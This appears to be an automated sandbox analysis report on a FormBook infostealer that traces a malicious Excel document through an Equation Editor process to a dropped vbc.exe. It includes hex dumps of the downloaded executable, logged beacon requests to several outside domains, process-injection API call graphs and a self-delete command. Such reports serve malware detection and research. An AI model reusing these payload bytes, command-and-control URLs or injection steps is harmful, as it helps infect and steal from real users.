                                      Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 04 00 9a c1 f3 61 00 00 00 00 00 00 00 00 e0 00 0e 01 0b 01 06 00 00 1a 0c 00 00 0a 00 00 00 00 00 00 5e 38 0c 00 00 20 00 00 00 40 0c 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 a0 0c 00 00 04 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 10 38 0c 00 4b 00 00 00 00 60 0c 00 b8 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 0c 00 0c 00 00 00 c1 37 0c 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 64 18 0c 00 00 20 00 00 00 1a 0c 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 73 64 61 74 61 00 00 e8 01 00 00 00 40 0c 00 00 02 00 00 00 1e 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 b8 05 00 00 00 60 0c 00 00 06 00 00 00 20 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 80 0c 00 00 02 00 00 00 26 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                      Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PELa^8 @@ @8K`7 H.textd `.sdata@@.rsrc` @@.reloc&@B
                                      Jan 28, 2022 22:47:31.609756947 CET3INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 38 0c 00 00 00 00 00 48 00 00 00 02 00 05 00 14 bd 00 00 44 f0 00 00 03 00 00 00 fe 00 00 06 58 ad 01 00 69 8a 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                      Data Ascii: @8HDXi0 8R( (:?&} (:(&(: 8(8 E
                                      Jan 28, 2022 22:47:31.609772921 CET4INData Raw: 00 06 7e 03 00 00 04 6f 1b 00 00 0a 0a 38 00 00 00 00 06 2a 00 00 13 30 04 00 22 00 00 00 05 00 00 11 00 28 07 00 00 06 20 4c 01 00 00 28 17 01 00 06 7e 03 00 00 04 6f 1b 00 00 0a 0a 38 00 00 00 00 06 2a 00 00 13 30 04 00 22 00 00 00 05 00 00 11
                                      Data Ascii: ~o8*0"( L(~o8*0"( f(~o8*0"( z(~o8*0"( (~o8*0"( (~
                                      Jan 28, 2022 22:47:31.609790087 CET5INData Raw: 36 28 3a 01 00 06 02 28 1f 00 00 0a 00 2a 00 00 6a 28 3a 01 00 06 73 32 00 00 06 28 20 00 00 0a 74 06 00 00 02 80 06 00 00 04 2a 00 0a 17 2a 00 0a 16 2a 00 1e 02 7b 07 00 00 04 2a 22 02 03 7d 07 00 00 04 2a 00 00 00 1e 02 7b 08 00 00 04 2a 22 02
                                      Data Ascii: 6(:(*j(:s2( t***{*"}*{*"}*{*"}*{*"}*{*"}*{*"}*{*"}*{*"}*6(:(***:(:
                                      Jan 28, 2022 22:47:31.888665915 CET7INData Raw: 0e 00 00 fe 0c 00 00 45 09 00 00 00 bd ff ff ff a9 ff ff ff 0e 00 00 00 0e 00 00 00 97 ff ff ff 97 ff ff ff 25 00 00 00 84 ff ff ff 3d 00 00 00 20 05 00 00 00 fe 0e 00 00 38 c5 ff ff ff 00 00 02 03 28 55 00 00 06 20 00 00 00 00 fe 0e 00 00 38 ae
                                      Data Ascii: E%= 8(U 8s#([ 9&***{*"}*{*"}*{*"}*{*"}*{*"}*{*"}*
                                      Jan 28, 2022 22:47:31.888710976 CET8INData Raw: ff 22 ff ff ff 25 00 00 00 20 05 00 00 00 28 89 00 00 06 3a c4 ff ff ff 26 09 08 28 c5 00 00 06 13 04 20 00 00 00 00 17 3a af ff ff ff 26 38 00 00 00 00 11 05 2a 00 00 36 28 3a 01 00 06 02 28 7e 00 00 06 00 2a 00 00 0a 17 2a 00 0a 16 2a 00 13 30
                                      Data Ascii: "% (:&( :&8*6(:(~***0 94&o89w 8o6@g8 E$ 8o69 8o8888
                                      Jan 28, 2022 22:47:31.888725996 CET10INData Raw: 00 00 73 b0 00 00 06 0a 20 04 00 00 00 16 39 2f 00 00 00 26 06 7b 26 00 00 04 28 a6 00 00 06 06 fe 06 b1 00 00 06 73 2b 00 00 0a 6f 2c 00 00 0a 38 bb ff ff ff 20 03 00 00 00 fe 0e 02 00 fe 0c 02 00 45 07 00 00 00 9f ff ff ff 0a 00 00 00 8d ff ff
                                      Data Ascii: s 9/&{&(s+o,8 E% 8(}& 88*0 8e(P}' 8Ss 8;{' 8%(
                                      Jan 28, 2022 22:47:31.888739109 CET11INData Raw: 39 1a 00 00 00 02 3a 06 00 00 00 16 38 09 00 00 00 02 28 3a 00 00 06 16 fe 01 38 01 00 00 00 16 6f d0 00 00 06 00 25 02 39 37 00 00 00 02 3a 06 00 00 00 17 38 09 00 00 00 02 28 3a 00 00 06 16 fe 03 39 1d 00 00 00 02 3a 06 00 00 00 17 38 0c 00 00
                                      Data Ascii: 9:8(:8o%97:8(:9:8(:8o%o8*0(s#8W8::898XX(o0X:
                                      Jan 28, 2022 22:47:31.888752937 CET12INData Raw: 46 00 00 04 02 28 0f 00 00 0a 20 15 00 00 00 fe 0e 03 00 38 b8 02 00 00 00 7e 3e 00 00 04 02 7b 33 00 00 04 02 7b 34 00 00 04 28 37 00 00 0a 1f 24 1f 34 02 7b 34 00 00 04 5a 58 6f 39 00 00 0a 20 0f 00 00 00 28 f2 00 00 06 3a 85 02 00 00 26 02 16
                                      Data Ascii: F( 8~>{3{4(7$4{4ZXo9 (:&}3 8k{4 :Y&~>{3{4(7s=o> 8&~?{3o1 9&~>{3{4(7s:o?
                                      Jan 28, 2022 22:47:31.888765097 CET14INData Raw: 20 16 00 00 00 38 41 00 00 00 11 04 15 fe 01 16 fe 01 13 0b 20 15 00 00 00 38 2d 00 00 00 08 13 0c 20 19 00 00 00 28 f3 00 00 06 39 1b 00 00 00 26 07 6f 44 00 00 0a 13 06 38 cc ff ff ff 20 08 00 00 00 fe 0e 0e 00 fe 0c 0e 00 45 1a 00 00 00 f1 fe
                                      Data Ascii: 8A 8- (9&oD8 E{nRRX'yf8n6m: :&9 (:q8lsA 8[:
                                      Jan 28, 2022 22:47:31.888777971 CET15INData Raw: 10 00 38 00 fd ff ff 11 05 3a 5a fc ff ff 20 06 00 00 00 28 f3 00 00 06 39 ee fc ff ff 26 06 17 58 0a 20 03 00 00 00 fe 0e 10 00 38 d7 fc ff ff 38 5c fc ff ff 00 7e 3e 00 00 04 11 0c 06 04 7b 4c 00 00 04 58 28 37 00 00 0a 14 6f 45 00 00 0a 20 2a
                                      Data Ascii: 8:Z (9&X 88\~>{LX(7oE *(:& (((: ((:&~A(3 8e z(((: (((: 8-{M{LX


                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                      1192.168.2.2249166216.177.167.580C:\Windows\explorer.exe
                                      TimestampkBytes transferredDirectionData
                                      Jan 28, 2022 22:48:48.110200882 CET839OUTGET /yrcy/?jdfhnl=EvxTDFUPJ2-xUnMP&aN=H+0J8LIoM8xANCuc1KZRmbjixQokhoGpIPkQBETMRHrzrLtxV7SOMJUbaHNEQWxSCcCQ4A== HTTP/1.1
                                      Host: www.hevenorfeed.com
                                      Connection: close
                                      Data Raw: 00 00 00 00 00 00 00
                                      Data Ascii:
                                      Jan 28, 2022 22:48:48.293118954 CET840INHTTP/1.1 301 Moved Permanently
                                      Date: Fri, 28 Jan 2022 21:48:48 GMT
                                      Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips PHP/7.4.27
                                      Location: https://www.hevenorfeed.com/yrcy/?jdfhnl=EvxTDFUPJ2-xUnMP&aN=H+0J8LIoM8xANCuc1KZRmbjixQokhoGpIPkQBETMRHrzrLtxV7SOMJUbaHNEQWxSCcCQ4A==
                                      Content-Length: 345
                                      Connection: close
                                      Content-Type: text/html; charset=iso-8859-1
                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 68 65 76 65 6e 6f 72 66 65 65 64 2e 63 6f 6d 2f 79 72 63 79 2f 3f 6a 64 66 68 6e 6c 3d 45 76 78 54 44 46 55 50 4a 32 2d 78 55 6e 4d 50 26 61 6d 70 3b 61 4e 3d 48 2b 30 4a 38 4c 49 6f 4d 38 78 41 4e 43 75 63 31 4b 5a 52 6d 62 6a 69 78 51 6f 6b 68 6f 47 70 49 50 6b 51 42 45 54 4d 52 48 72 7a 72 4c 74 78 56 37 53 4f 4d 4a 55 62 61 48 4e 45 51 57 78 53 43 63 43 51 34 41 3d 3d 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                      Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="https://www.hevenorfeed.com/yrcy/?jdfhnl=EvxTDFUPJ2-xUnMP&amp;aN=H+0J8LIoM8xANCuc1KZRmbjixQokhoGpIPkQBETMRHrzrLtxV7SOMJUbaHNEQWxSCcCQ4A==">here</a>.</p></body></html>


                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                      2192.168.2.2249167162.241.244.4680C:\Windows\explorer.exe
                                      TimestampkBytes transferredDirectionData
                                      Jan 28, 2022 22:48:53.784817934 CET841OUTGET /yrcy/?aN=e/RF5Wkvcu2kD6Q92hYVOLL0JiY85m+wPQ7mJBVhAbkMJKQBASQfBcFHsaVDtw323W8DmA==&jdfhnl=EvxTDFUPJ2-xUnMP HTTP/1.1
                                      Host: www.dairatwsl.com
                                      Connection: close
                                      Data Raw: 00 00 00 00 00 00 00
                                      Data Ascii:
                                      Jan 28, 2022 22:48:54.662053108 CET841INHTTP/1.1 301 Moved Permanently
                                      Date: Fri, 28 Jan 2022 21:48:54 GMT
                                      Server: nginx/1.19.10
                                      Content-Type: text/html; charset=UTF-8
                                      Content-Length: 0
                                      Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                      Cache-Control: no-cache, must-revalidate, max-age=0
                                      X-Redirect-By: WordPress
                                      Location: http://dairatwsl.com/yrcy/?aN=e/RF5Wkvcu2kD6Q92hYVOLL0JiY85m+wPQ7mJBVhAbkMJKQBASQfBcFHsaVDtw323W8DmA==&jdfhnl=EvxTDFUPJ2-xUnMP
                                      host-header: c2hhcmVkLmJsdWVob3N0LmNvbQ==
                                      X-Endurance-Cache-Level: 2
                                      X-nginx-cache: WordPress
                                      X-Server-Cache: true
                                      X-Proxy-Cache: MISS


                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                      3192.168.2.2249169206.188.192.280C:\Windows\explorer.exe
                                      TimestampkBytes transferredDirectionData
                                      Jan 28, 2022 22:49:10.698079109 CET842OUTGET /yrcy/?jdfhnl=EvxTDFUPJ2-xUnMP&aN=v3r6hW97z/ZOf9TDdHCkxkGayxrL9igaQBwyCSAaMVPNp+0Lw1V9xr9SflbU5XGqGaZNIw== HTTP/1.1
                                      Host: www.laqueenbeautybar.supplies
                                      Connection: close
                                      Data Raw: 00 00 00 00 00 00 00
                                      Data Ascii:
                                      Jan 28, 2022 22:49:10.816883087 CET843INHTTP/1.1 400 Bad Request
                                      Server: openresty/1.19.9.1
                                      Date: Fri, 28 Jan 2022 21:49:10 GMT
                                      Content-Type: text/html
                                      Content-Length: 163
                                      Connection: close
                                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 2f 31 2e 31 39 2e 39 2e 31 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                      Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>openresty/1.19.9.1</center></body></html>


                                      Statistics

                                      CPU Usage

                                      Click to jump to process

                                      Memory Usage

                                      Click to jump to process

                                      High Level Behavior Distribution

                                      Click to dive into process behavior distribution

                                      Behavior

                                      Click to jump to process

                                      System Behavior

                                      General

                                      Target ID:0
                                      Start time:22:46:16
                                      Start date:28/01/2022
                                      Path:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                      Wow64 process (32bit):false
                                      Commandline:"C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
                                      Imagebase:0x13fc60000
                                      File size:28253536 bytes
                                      MD5 hash:D53B85E21886D2AF9815C377537BCAC3
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Reputation:high

                                      General

                                      Target ID:2
                                      Start time:22:46:38
                                      Start date:28/01/2022
                                      Path:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                      Wow64 process (32bit):true
                                      Commandline:"C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
                                      Imagebase:0x400000
                                      File size:543304 bytes
                                      MD5 hash:A87236E214F6D42A65F5DEDAC816AEC8
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Reputation:high

                                      General

                                      Target ID:4
                                      Start time:22:46:43
                                      Start date:28/01/2022
                                      Path:C:\Users\Public\vbc.exe
                                      Wow64 process (32bit):true
                                      Commandline:"C:\Users\Public\vbc.exe"
                                      Imagebase:0xff0000
                                      File size:796672 bytes
                                      MD5 hash:A8F58E851A89075EE8AB92E5CB6A776C
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:.Net C# or VB.NET
                                      Yara matches:
                                      • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000004.00000002.478639061.00000000024C1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000004.00000002.479122518.00000000034C9000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000004.00000002.479122518.00000000034C9000.00000004.00000800.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                      • Rule: Formbook, Description: detect Formbook in memory, Source: 00000004.00000002.479122518.00000000034C9000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                      • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000004.00000002.478926747.0000000002550000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                      Antivirus matches:
                                      • Detection: 100%, Joe Sandbox ML
                                      Reputation:low

                                      General

                                      Target ID:5
                                      Start time:22:46:47
                                      Start date:28/01/2022
                                      Path:C:\Users\Public\vbc.exe
                                      Wow64 process (32bit):true
                                      Commandline:C:\Users\Public\vbc.exe
                                      Imagebase:0xff0000
                                      File size:796672 bytes
                                      MD5 hash:A8F58E851A89075EE8AB92E5CB6A776C
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Yara matches:
                                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000002.511693460.00000000001C0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000002.511693460.00000000001C0000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                      • Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000002.511693460.00000000001C0000.00000040.10000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000002.511806943.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000002.511806943.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                      • Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000002.511806943.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000000.470929460.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000000.470929460.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                      • Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000000.470929460.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000000.477062967.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000000.477062967.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                      • Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000000.477062967.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000002.511894951.00000000005B0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000002.511894951.00000000005B0000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                      • Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000002.511894951.00000000005B0000.00000040.10000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                      Reputation:low

                                      General

                                      Target ID:6
                                      Start time:22:46:53
                                      Start date:28/01/2022
                                      Path:C:\Windows\explorer.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\Explorer.EXE
                                      Imagebase:0xffa10000
                                      File size:3229696 bytes
                                      MD5 hash:38AE1B3C38FAEF56FE4907922F0385BA
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Yara matches:
                                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000006.00000000.503199195.00000000097CB000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000006.00000000.503199195.00000000097CB000.00000040.00000001.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                      • Rule: Formbook, Description: detect Formbook in memory, Source: 00000006.00000000.503199195.00000000097CB000.00000040.00000001.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000006.00000000.496910785.00000000097CB000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000006.00000000.496910785.00000000097CB000.00000040.00000001.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                      • Rule: Formbook, Description: detect Formbook in memory, Source: 00000006.00000000.496910785.00000000097CB000.00000040.00000001.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                      Reputation:high

                                      General

                                      Target ID:7
                                      Start time:22:47:04
                                      Start date:28/01/2022
                                      Path:C:\Windows\SysWOW64\cscript.exe
                                      Wow64 process (32bit):true
                                      Commandline:C:\Windows\SysWOW64\cscript.exe
                                      Imagebase:0xed0000
                                      File size:126976 bytes
                                      MD5 hash:A3A35EE79C64A640152B3113E6E254E2
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Yara matches:
                                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000007.00000002.668980858.0000000000070000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000007.00000002.668980858.0000000000070000.00000040.80000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                      • Rule: Formbook, Description: detect Formbook in memory, Source: 00000007.00000002.668980858.0000000000070000.00000040.80000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000007.00000002.669019561.0000000000140000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000007.00000002.669019561.0000000000140000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                      • Rule: Formbook, Description: detect Formbook in memory, Source: 00000007.00000002.669019561.0000000000140000.00000040.10000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000007.00000002.669067975.00000000001D0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000007.00000002.669067975.00000000001D0000.00000004.00000800.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                      • Rule: Formbook, Description: detect Formbook in memory, Source: 00000007.00000002.669067975.00000000001D0000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                      Reputation:moderate

                                      General

                                      Target ID:8
                                      Start time:22:47:09
                                      Start date:28/01/2022
                                      Path:C:\Windows\SysWOW64\cmd.exe
                                      Wow64 process (32bit):true
                                      Commandline:/c del "C:\Users\Public\vbc.exe"
                                      Imagebase:0x4aa10000
                                      File size:302592 bytes
                                      MD5 hash:AD7B9C14083B52BC532FBA5948342B98
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Reputation:high

                                      Disassembly

                                      Reset < >

                                        Execution Graph

                                        Execution Coverage:14.3%
                                        Dynamic/Decrypted Code Coverage:100%
                                        Signature Coverage:0%
                                        Total number of Nodes:119
                                        Total number of Limit Nodes:2
                                        execution_graph 6581 c01635 6583 c01275 6581->6583 6582 c0167a 6583->6582 6586 c01ce6 6583->6586 6600 c01c58 6583->6600 6587 c01c74 6586->6587 6589 c01ce9 6586->6589 6590 c01ce6 12 API calls 6587->6590 6588 c01cb3 6596 c01cc5 6588->6596 6613 c02370 6588->6613 6621 c02155 6588->6621 6632 c020ee 6588->6632 6636 c0286c 6588->6636 6644 c02a99 6588->6644 6648 c02442 6588->6648 6658 c02353 6588->6658 6666 c02571 6588->6666 6589->6583 6590->6588 6596->6583 6601 c01c85 6600->6601 6604 c01ce6 12 API calls 6601->6604 6602 c01cb3 6603 c01cc5 6602->6603 6605 c02370 4 API calls 6602->6605 6606 c02571 4 API calls 6602->6606 6607 c02442 6 API calls 6602->6607 6608 c02353 4 API calls 6602->6608 6609 c02155 6 API calls 6602->6609 6610 c02a99 2 API calls 6602->6610 6611 c0286c 4 API calls 6602->6611 6612 c020ee 2 API calls 6602->6612 6603->6583 6604->6602 6605->6603 6606->6603 6607->6603 6608->6603 6609->6603 6610->6603 6611->6603 6612->6603 6614 c02379 6613->6614 6616 c023a6 6614->6616 6674 c00820 6614->6674 6678 c00819 6614->6678 6615 c028f5 6615->6616 6682 c00940 6615->6682 6686 c00948 6615->6686 6622 c02162 6621->6622 6623 c0267e 6621->6623 6690 c006f0 6622->6690 6694 c006e9 6622->6694 6698 c03057 6623->6698 6703 c03068 6623->6703 6624 c0273e 6625 c0231f 6624->6625 6626 c00940 WriteProcessMemory 6624->6626 6627 c00948 WriteProcessMemory 6624->6627 6625->6596 6626->6625 6627->6625 6716 c00ce0 6632->6716 6720 c00cd4 6632->6720 6637 c02876 6636->6637 6642 c00820 VirtualAllocEx 6637->6642 6643 c00819 VirtualAllocEx 6637->6643 6638 c028f5 6639 c02985 6638->6639 6640 c00940 WriteProcessMemory 6638->6640 6641 c00948 WriteProcessMemory 6638->6641 6640->6639 6641->6639 6642->6638 6643->6638 6646 c00940 WriteProcessMemory 6644->6646 6647 c00948 WriteProcessMemory 6644->6647 6645 c02a79 6646->6645 6647->6645 6724 c00aa1 6648->6724 6728 c00aa8 6648->6728 6649 c02464 6650 c02299 6649->6650 6654 c00820 VirtualAllocEx 6649->6654 6655 c00819 VirtualAllocEx 6649->6655 6651 c028f5 6651->6650 6652 c00940 WriteProcessMemory 6651->6652 6653 c00948 WriteProcessMemory 6651->6653 6652->6650 6653->6650 6654->6651 6655->6651 6659 c02597 6658->6659 6661 c02360 6658->6661 6659->6661 6662 c00820 VirtualAllocEx 6659->6662 6663 c00819 VirtualAllocEx 6659->6663 6660 c028f5 6660->6661 6664 c00940 WriteProcessMemory 6660->6664 6665 c00948 WriteProcessMemory 6660->6665 6662->6660 6663->6660 6664->6661 6665->6661 6667 c0257b 6666->6667 6669 c023a6 6667->6669 6670 c00820 VirtualAllocEx 6667->6670 6671 c00819 VirtualAllocEx 6667->6671 6668 c028f5 6668->6669 6672 c00940 WriteProcessMemory 6668->6672 6673 c00948 WriteProcessMemory 6668->6673 6670->6668 6671->6668 6672->6669 6673->6669 6675 c00864 VirtualAllocEx 